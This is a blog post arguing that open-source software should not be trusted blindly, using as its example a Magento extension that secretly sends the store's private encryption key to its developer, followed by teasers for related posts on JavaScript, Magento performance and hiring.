Never Explicitly Trust Software Because It Is Open-Source

One of the major ideas behind open source projects is that allowing anyone that wants to view the source code of a project to be able to do so should make bugs and security weaknesses easy to find. While this did not work so well with OpenSSL and its various bugs that have been exposed recently, I do have an example where it worked extremely well.

Magento is an eCommerce platform that has two separate editions. One is a completely open-source and free as in beer Community edition. The other is a somewhat expensive Enterprise Edition. There is a large community of Magento developers that create extentions, or addons, for these two editions of Magento.

One of these “Magento developers” is a company whose products I’d never use. They create some CMS addon for Magento that has an evil feature. Many current extensions “phone home” to the main developer’s servers to tell them what sites are using their extensions among other various bits of information. What makes this “open source” extension’s “phoning home” so insidious is that part of the information it sends to its developer’s servers is the private encryption key that the Magento installation uses to encrypt passwords for users among other things.

That’s right, an open-source Magento extension is collecting private encryption keys and sending them to the extension developer.

While the “developer” of this extension claims this was all to track unauthorized usage of their extension, the response should not make you feel any better about their bad software. If you look at the Magento Stack Exchange profile of the supposed “developer”, there is no contact information listed or even a website for the extension. If you dig a bit deeper and look at the developer’s website, you will be unable to find any way to contact the developer other than the contact form on the website. This developer does not even give you a hint as to what country they are based in, other than the fact that they are processing payments in Euro. To top it all off, the developer also does not disclose any contact information in the registration of their domain. They seem quite private and secretive for a company that creates open-source extensions for Magento.

The thing to take from this is that before using any software, including open source software, you should weigh the security risks that the software poses and address them appropriately. In the case of Magento extensions like this one that has the potential to expose customer data, potentially even credit card information, you should have a trusted developer review the entire codebase of any third-party extensions you wish to install on your site.

To prevent security breaches, an ounce of prevention is worth a pound of a cure.

Tags:

Related Posts

Jan 7, 2015
2 minutes

JavaScript Can Have An Interesting Interpretation of Order

There is an interesting little quirk with the way in which JavaScript decides which function it should execute next. You see, while the JavaScript engine has a single thread of execution, it creates the illusion of multiple simultaneous processes running at once by utilizing a queue of functions to execute. This means that every time you make a call to a function in your JavaScript, there is no absolute guarantee that it will be the next piece of code run, as there may have been other events triggered that beat your custom function onto the execution queue.

#javascript #web-development
Read More
Apr 24, 2014
2 minutes

Optimize Magento Time To First Byte

When looking at the performance of your site, waterfall charts are one of the first places you should investigate. The first thing that is represented on these charts is that the HTML for the website is the first resource that is downloaded every time.

As a result of being the first resource downloaded every time, this is the logical first place to look to improve the performance of your Magento website. There are a few ways to make sure that the page downloads more quickly, and they all involve making sure that the file size is as small as possible.

#magento #performance
Read More
Jan 4, 2015
3 minutes

Top Job Applicants Never Stop Learning

From time to time, my job allows me to be a part of the hiring process for our technical positions. Unfortunately for some of the applicants, I repeatedly come away from these interviews amazed at the responses I get from pretty standard and basic technical questions related to Web Development.

Recently we were looking for a front-end web developer that was good at UX and design and proficient at HTML, CSS, and JavaScript. One of the things that we tend to ask everyone is to rate themselves on a scale of 1 to 10 as to how good they are with each technology. The majority of responses are in the 5-8 range with the corresponding answers to the questions about each techology falling about in the range you would expect. A couple of applicants were brave enough to rate themselves at a 9.5 out of 10 on HTML, CSS, and JavaScript, leading us to believe they were “exceptional applicants”.

#javascript #css #rant
Read More